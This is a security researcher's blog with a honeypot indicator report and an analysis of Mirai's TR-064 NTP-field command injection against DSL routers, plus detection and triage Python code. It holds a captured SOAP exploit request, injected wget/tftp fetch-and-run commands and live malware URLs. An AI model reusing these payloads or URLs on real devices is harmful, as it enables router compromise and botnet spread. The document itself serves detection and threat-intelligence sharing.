Saturday, 31 December 2016

New Year's Eve 2016 - Honeypot report

Happy New Year everyone

I have had my honeypot (https://github.com/johestephan/SendMeSpamIDS.py) running for quite a while now. I take the chance of a new year to summarize the last weeks in one New Year's Eve report. The indicators were fetched with the shell scripts from my toolbox (https://github.com/johestephan/CTI-Toolbox); in particular
  • getindiV1.sh - fetch all indicators (see report below)
  • getCodeV1.sh - try to execute all wget calls in a file
were created to work on the log files I receive.
This report is also available on X-Force Exchange
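As an added illustration of what an indicator-extraction pass over the honeypot logs has to do (this is example Python written for this page, not the toolbox's getindiV1.sh, whose shell source is on GitHub), the following parses a few constructed log lines in an assumed one-request-per-line layout, pulls out the four indicator classes of the report, drops loopback and private source addresses, and prints the result in the report's section layout. The defang helper renders URLs in the hxxp://host[.]tld notation used further down this blog.

```python
import re
from ipaddress import ip_address

# Constructed log lines for this example; the assumed layout is
# "<timestamp> <client ip> <method> <path> <request body or ->".
# Hosts and commands mirror the shapes reported in the post.
SAMPLE_LOG = """\
2016-12-04T01:12:03 163.172.190.56 GET / -
2016-12-04T01:13:44 185.128.43.174 POST /UD/act?1 <NewNTPServer1>`cd /var/tmp;cd /tmp;wget http://binpt.pw/a;sh a`</NewNTPServer1>
2016-12-04T01:15:10 89.248.168.213 POST /UD/act?1 <NewNTPServer1>`cd /tmp;tftp -l b -r b -g afpen.pw 6969;sh b`</NewNTPServer1>
2016-12-04T01:16:02 127.0.0.1 GET /health -
2016-12-04T01:17:30 94.102.48.194 POST /UD/act?1 <NewNTPServer1>`wget http://5.8.65.5/1;chmod +x 1;./1`</NewNTPServer1>
"""

# A URL ends at whitespace, quotes, XML brackets, backticks or a shell ';'.
URL_RE = re.compile(r'https?://[^\s"\'<>`;]+')
# wget target: optional flags, then the URL.
WGET_RE = re.compile(r'\bwget\s+(?:-\S+\s+)*(https?://[^\s"\'<>`;]+)')
# BusyBox tftp get: "tftp -l <local> -r <remote> -g <host> [port]".
TFTP_RE = re.compile(r'\btftp(?:\s+-[lr]\s+\S+)*\s+-g\s+[^\s;`<>]+(?:\s+\d+)?')


def parse_line(line):
    """Split one log line into (client_ip, request_text); None if malformed."""
    parts = line.split(" ", 4)
    if len(parts) < 5:
        return None
    _ts, ip, method, path, body = parts
    return ip, f"{method} {path} {body}"


def extract_indicators(log_text):
    """Collect scanning IPs, HTTP URLs, wget targets and tftp commands."""
    found = {"scanning_ips": set(), "http_urls": set(), "wget": set(), "tftp": set()}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, request = parsed
        try:
            addr = ip_address(ip)
        except ValueError:
            continue
        # Loopback/private sources are the honeypot host or local probes,
        # not external scanners (127.0.0.1 in the raw report is such a case).
        if not (addr.is_loopback or addr.is_private):
            found["scanning_ips"].add(ip)
        found["http_urls"].update(URL_RE.findall(request))
        found["wget"].update(WGET_RE.findall(request))
        found["tftp"].update(m.group(0) for m in TFTP_RE.finditer(request))
    result = {key: sorted(vals) for key, vals in found.items()}
    result["scanning_ips"] = sorted(found["scanning_ips"], key=ip_address)
    return result


def defang(url):
    """Render a URL in the hxxp://host[.]tld form used for sharing indicators."""
    m = re.match(r"(https?)(://)([^/:]+)(.*)", url)
    if m is None:
        return url.replace(".", "[.]")
    scheme, sep, host, rest = m.groups()
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + rest


def render_report(indicators, defanged=False):
    """Lay out the four sections like the report above."""
    sections = [("Scanning IPs", "scanning_ips"), ("HTTP URLs (objects)", "http_urls"),
                ("WGET (objects)", "wget"), ("TFTP (objects)", "tftp")]
    out = []
    for title, key in sections:
        out.append(f"{title}:")
        out.append("=" * 37)
        for item in indicators[key]:
            out.append(defang(item) if defanged and key != "scanning_ips" else item)
    return "\n".join(out)


if __name__ == "__main__":
    print(render_report(extract_indicators(SAMPLE_LOG), defanged=True))
```

The regexes stop at `;` and backticks on purpose: in the TR-064 payloads the download URL sits inside a backticked command chain, and a naive URL pattern would swallow the `;sh a` that follows it.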

The lists below are the raw output of getindiV1.sh and are not curated: 127.0.0.1 is the honeypot's own loopback address rather than an external scanner, and some HTTP entries are benign strings that the extraction picked up from the requests (the SOAP namespace URLs from the TR-064 calls described in the post below, and the masscan GitHub URL, which masscan sends in its default User-Agent header).

Scanning IPs:
=====================================
127.0.0.1
163.172.190.56
185.128.43.174
195.154.179.148
212.175.89.190
23.152.0.18
46.4.90.85
51.15.44.122
51.15.56.205
54.218.98.192
62.210.149.68
81.12.119.27
81.12.121.183
81.12.126.233
81.171.12.232
89.248.168.213
89.248.172.207
92.50.64.234
94.102.48.194
94.102.56.181
HTTP URLs (objects):
=====================================
http
http://163.21.46.2/appserv/a.txt
http://180.163.113.82/check
http://5.39.93.71/2jvf
http://5.39.93.71/aenv
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://clientapi.ipip.net/echo.php
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
httpheader.net
http://httpheader.net/
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
https://github.com/robertdavidgraham/masscan
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
WGET (objects):
=====================================
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
TFTP (objects):
=====================================
tftp -l 3 -r 1 -g l.ocalhost.host
tftp -l b -r b -g afpen.pw 6969
tftp -l b -r b -g binpt.pw
tftp -l b -r b -g cvfyb.pw 6969
tftp -l b -r b -g gdiqt.pw 6969
tftp -l b -r b -g ixvip.pw 6969
tftp -l b -r b -g jgop.org
tftp -l b -r b -g jzion.pw
tftp -l b -r b -g mrjyq.pw 6969
tftp -l b -r b -g mvtul.pw 6969
tftp -l b -r b -g qplok.pw 6969
tftp -l b -r b -g qrxou.pw 6969
tftp -l b -r b -g vizxv.pw

Sunday, 4 December 2016

These strange SOAP calls (Mirai)

After the huge attack on Deutsche Telekom I decided to update my honeypot software and also opened port 7547, which was used in this recent attack, to see what the possible interactions might be. Port 7547 is the port on which the TR-069 (CWMP) remote management and the TR-064 configuration interface of many DSL routers listen. Just a few hours after restarting the honeypot I saw the first attempts. The request below shows the pattern: a TR-064 SetNTPServers call whose NewNTPServer1 value is not a server name but a shell command in backticks.

POST /UD/act?1 HTTP/1.1
Host: 127.0.0[.]1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519

<?xml version ="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="hxxp://schemas.xmlsoap[.]org/soap/envelope/" SOAP-ENV:encodingStyle="hxxp://schemas.xmlsoap[.]org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /var/tmp;cd /tmp;wget hxxp://binpt[.]pw/a;sh a`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
I have seen several attempts like this:

  • cd /var/tmp;cd /tmp;wget hxxp://binpt[.]pw/a
  • cd /var/tmp;cd /tmp;wget hxxp://srrys[.]pw/a
  • cd /var/tmp;cd /tmp;tftp -l b -r b -g binpt[.]pw;sh b
  • tftp -l b -r b -g srrys[.]pw;sh b
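To turn the captured request into a detection and to show what the vulnerable firmware should have checked, here is an added Python example (written for this page, not part of the honeypot or of any vendor code). The request string is constructed from the capture above with the defanging removed so that it parses; the function names and the hostname rule are this example's own assumptions.

```python
import re
import xml.etree.ElementTree as ET

TIME_SERVICE = "urn:dslforum-org:service:Time:1"

# Constructed request modelled on the one captured above, defanging removed.
RAW_REQUEST = (
    "POST /UD/act?1 HTTP/1.1\r\n"
    "Host: 127.0.0.1:7547\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    "<NewNTPServer1>`cd /var/tmp;cd /tmp;wget http://binpt.pw/a;sh a`</NewNTPServer1>"
    "<NewNTPServer2></NewNTPServer2><NewNTPServer3></NewNTPServer3>"
    "<NewNTPServer4></NewNTPServer4><NewNTPServer5></NewNTPServer5>"
    "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)
INJECTED = "`cd /var/tmp;cd /tmp;wget http://binpt.pw/a;sh a`"

# Characters that have no place in an NTP server name but drive a shell.
SHELL_META = re.compile(r"[`;|&$<>()]")
# Hostname labels or a dotted IPv4 literal: what the field should accept.
HOST_RE = re.compile(r"^(?:[A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}$")


def split_request(raw):
    """Split a raw HTTP request into (request line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def ntp_server_values(body):
    """Return {NewNTPServerN: text} from a TR-064 SetNTPServers body."""
    # Honeypot input is untrusted; for production use defusedxml instead of the stdlib parser.
    root = ET.fromstring(body)
    action = root.find(f".//{{{TIME_SERVICE}}}SetNTPServers")
    if action is None:
        return {}
    # The NewNTPServerN elements carry no namespace prefix in the capture.
    return {el.tag: (el.text or "") for el in action if el.tag.startswith("NewNTPServer")}


def is_valid_ntp_server(value):
    """The check the vulnerable firmware lacked: empty, a hostname or an IPv4 literal only."""
    return value == "" or (len(value) <= 253 and HOST_RE.match(value) is not None)


def inspect_tr064_request(raw):
    """Flag SetNTPServers fields that are not a plain host and extract any backticked command."""
    _request_line, headers, body = split_request(raw)
    if "setntpservers" not in headers.get("soapaction", "").lower():
        return []
    findings = []
    for field, value in ntp_server_values(body).items():
        if is_valid_ntp_server(value):
            continue
        backticked = re.match(r"^`(.*)`$", value, re.S)
        findings.append({
            "field": field,
            "value": value,
            "shell_meta": SHELL_META.search(value) is not None,
            "command": backticked.group(1) if backticked else None,
        })
    return findings


if __name__ == "__main__":
    for finding in inspect_tr064_request(RAW_REQUEST):
        print(finding["field"], "->", finding["command"] or finding["value"])
```

The allow-list in is_valid_ntp_server is the point: a field that is supposed to hold a host name never needs a backtick, a semicolon or a slash, so rejecting anything that is not a host name closes the injection without having to enumerate shell syntax.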
For at least one of them I was able to fetch the malware it tried to install:


hxxp://binpt[.]pw/a

This is a simple shell script that downloads several other files and tries to execute them.

hxxp://binpt[.]pw/1
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
MD5: e1936defa1f093f52c69072f4b192451

hxxp://binpt[.]pw/2
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
MD5: b92b1fe8c3ca945e1739b0ec81ad99b5

hxxp://binpt[.]pw/3
ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
MD5: fd6a1ec4fd8381d525b7de7a2f317079 

hxxp://binpt[.]pw/4
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
MD5: 4a8145ae760385c1c000113a9ea00a3a
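The four files are the usual multi-architecture set of such a dropper: each ELF only runs on one CPU and byte-order combination, so the script fetches all of them and lets the ones that do not match the device fail. As an added example (not the author's tooling, and with constructed ELF headers standing in for the real samples, which are not reproduced here), the following reads the ELF identification and e_machine fields the way `file` does, hashes each payload, and reports which one a given device could actually execute.

```python
import hashlib
import struct

# e_machine values from the ELF specification for the architectures seen above.
EM_NAMES = {3: "Intel 80386", 8: "MIPS", 40: "ARM", 42: "Renesas SH", 62: "x86-64"}
ELF32_FMT = "HHIIIIIHHHHHH"  # e_type .. e_shstrndx, after the 16-byte e_ident


def elf_summary(data):
    """`file`-style one-liner from the ELF header; None if not an ELF image."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    bits = {1: "32-bit", 2: "64-bit"}.get(ei_class, "unknown-class")
    endian = {1: "LSB", 2: "MSB"}.get(ei_data, "unknown-endian")
    # e_type and e_machine are stored in the file's own byte order.
    order = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(order + "HH", data, 16)
    kind = {1: "relocatable", 2: "executable", 3: "shared object"}.get(e_type, "unknown-type")
    machine = EM_NAMES.get(e_machine, f"machine {e_machine}")
    # "statically linked" and "stripped" need program/section headers; not derived here.
    return f"ELF {bits} {endian} {kind}, {machine}"


def arch_key(data):
    """Short architecture tag such as MIPS-LSB, for grouping dropper payloads."""
    if elf_summary(data) is None:
        return None
    order = "<" if data[5] == 1 else ">"
    _e_type, e_machine = struct.unpack_from(order + "HH", data, 16)
    return f"{EM_NAMES.get(e_machine, str(e_machine))}-{'LSB' if data[5] == 1 else 'MSB'}"


def triage(samples):
    """Hash and classify each fetched file; samples is {name: bytes}."""
    return [{"name": name, "md5": hashlib.md5(data).hexdigest(),
             "summary": elf_summary(data), "arch": arch_key(data)}
            for name, data in samples.items()]


def runnable_on(samples, machine_name, endian):
    """Names of the payloads that could execute on a device of this architecture."""
    return [r["name"] for r in triage(samples) if r["arch"] == f"{machine_name}-{endian}"]


def make_elf_header(ei_data, e_machine):
    """Constructed 52-byte ELF32 executable header (only the fields read above matter)."""
    order = "<" if ei_data == 1 else ">"
    e_ident = b"\x7fELF" + bytes([1, ei_data, 1, 0]) + b"\x00" * 8
    return e_ident + struct.pack(order + ELF32_FMT,
                                 2, e_machine, 1, 0x400000, 52, 0, 0, 52, 32, 1, 40, 0, 0)


# Constructed stand-ins for the four files the dropper fetched: same
# architectures as the `file` output above, but not the real samples.
SAMPLES = {
    "1": make_elf_header(1, 8),   # MIPS little-endian
    "2": make_elf_header(2, 8),   # MIPS big-endian
    "3": make_elf_header(1, 40),  # ARM
    "4": make_elf_header(1, 42),  # Renesas SH
}

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row["name"], row["md5"], row["summary"])
```

Run against the real downloads, triage() gives the hash and architecture of every file without executing anything, which is the safe first step before sending samples to VirusTotal or a vendor.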

Good for us, all files are already known on VirusTotal. I also shared them with Avira, which was not yet listed among the detecting engines on VirusTotal. As a result Avira has categorized them as:

  • 4 MALWARE LINUX/Mirai.oyagk 
  • 3 MALWARE LINUX/Mirai.bzpfn 
  • 2 MALWARE LINUX/Mirai.upnsp
  • 1 MALWARE LINUX/Mirai.armrl 

This report is also available on IBM X-Force Exchange.